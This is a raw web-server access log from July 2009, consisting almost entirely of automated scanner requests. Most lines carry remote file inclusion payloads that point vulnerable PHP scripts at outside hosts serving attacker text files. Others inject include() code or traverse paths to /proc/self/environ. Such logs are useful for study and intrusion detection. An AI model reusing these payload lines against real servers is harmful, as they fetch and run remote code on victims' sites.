114.200.199.144 - - [05/Jul/2009:09:37:30 -0700] "GET /logs/access_090525.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:37:33 -0700] "GET /logs/access_090521.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:37:33 -0700] "GET /logs/access_090525.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:39:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:39:32 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:01 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:01 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:40:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:40:02 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:40:02 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:24 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:25 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:40:30 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:40:44 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:09:40:54 -0700] "GET /logs/access_090602.log//appserv/main.php?appserv_root=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:09:41:09 -0700] "GET /logs/access_090530.log/e404.php?DOCUMENT_ROOT=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:41:30 -0700] "GET /logs/access_090610.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:41:33 -0700] "GET /logs/access_090523.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:41:33 -0700] "GET /logs/access_090610.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:42:07 -0700] "GET /logs/access_090531.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:42:20 -0700] "GET /logs/access_090524.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:42:21 -0700] "GET /logs/access_090531.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:42:21 -0700] "GET /logs/access_090523.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:42:21 -0700] "GET /logs/access_090610.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:42:32 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:43:15 -0700] "GET /logs/access_090531.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:43:20 -0700] "GET /logs/access_090524.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:44:18 -0700] "GET /administrator/components/com_moofaq/css/errors.php?error=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:44:18 -0700] "GET /logs/access_090624.log//administrator/components/com_moofaq/css/errors.php?error=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:44:19 -0700] "GET /logs//administrator/components/com_moofaq/css/errors.php?error=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:09:44:21 -0700] "GET /logs/access_090619.log//administrator/components/com_moofaq/css/errors.php?error=http://ohmyflash.com/form/idev.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:44:43 -0700] "GET /logs/access_090524.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:45:43 -0700] "GET /logs/access_090517.log/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:45:43 -0700] "GET /errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:45:43 -0700] "GET /logs/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:53 -0700] "GET /logs/access_090517.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:53 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:54 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:54 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:54 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:55 -0700] "GET /logs/access_090517.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:57 -0700] "GET /logs/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:57 -0700] "GET /logs/access_090517.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:45:57 -0700] "GET /errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:46:04 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:46:04 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:46:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:09:46:57 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
212.227.48.220 - - [05/Jul/2009:09:47:27 -0700] "GET /logs/access_090605.log/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.227.48.220 - - [05/Jul/2009:09:47:27 -0700] "GET /logs/?sourcedir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.245.84 - - [05/Jul/2009:09:50:01 -0700] "GET /redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
87.106.245.84 - - [05/Jul/2009:09:50:01 -0700] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://buy2pc.co.kr/xml/test.xml??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:20 -0700] "GET /logs/access_090517.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:20 -0700] "GET /logs/access_090517.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:28 -0700] "GET /logs/access_090517.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:39 -0700] "GET /logs/access_090518.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:39 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:50:39 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:51:08 -0700] "GET /logs/access_090517.log%20%20/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:52:11 -0700] "GET /logs/access_090602.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:52:13 -0700] "GET /logs/access_090602.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:52:16 -0700] "GET /logs/access_090602.log%20%20/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.61.233 - - [05/Jul/2009:09:52:21 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.puaga.com"
220.181.61.233 - - [05/Jul/2009:09:52:31 -0700] "GET /ideal/forum/viewtopic.php?p=21584 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:52:44 -0700] "GET /logs/access_090602.log%20%20/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.234 - - [05/Jul/2009:09:52:57 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:09:54:05 -0700] "GET /logs/access_090521.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:09:54:05 -0700] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090521.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:09:54:05 -0700] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_090521.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:09:54:26 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:55 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:55 -0700] "GET /logs/access_090602.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:57 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:09:57:57 -0700] "GET /logs/access_090602.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:58:35 -0700] "GET /logs/access_090602.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:58:41 -0700] "GET /logs/access_090602.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.200.199.144 - - [05/Jul/2009:09:58:51 -0700] "GET /logs/access_090602.log/errors.php?error=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:09:59:34 -0700] "GET /logs/access_090602.log/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs/access_090614.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs/access_090614.log//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
207.210.89.18 - - [05/Jul/2009:10:02:17 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:05 -0700] "GET /logs/access_090531.log/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:06 -0700] "GET /logs/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:06 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:11 -0700] "GET /logs/access_090606.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:11 -0700] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:16 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:20 -0700] "GET /logs/access_090609.log/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:26 -0700] "GET /logs/access_090517.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:29 -0700] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:29 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:03:32 -0700] "GET /logs/access_090520.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:10:04:07 -0700] "GET /logs/access_090606.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:10:04:10 -0700] "GET /logs/access_090518.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:10:04:10 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:10:04:10 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.201.245.60 - - [05/Jul/2009:10:04:58 -0700] "GET /logs/access_090518.log%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.anarchitetti.it/site/uploads/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.87.217.26 - - [05/Jul/2009:10:05:19 -0700] "GET /logs/access_090523.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
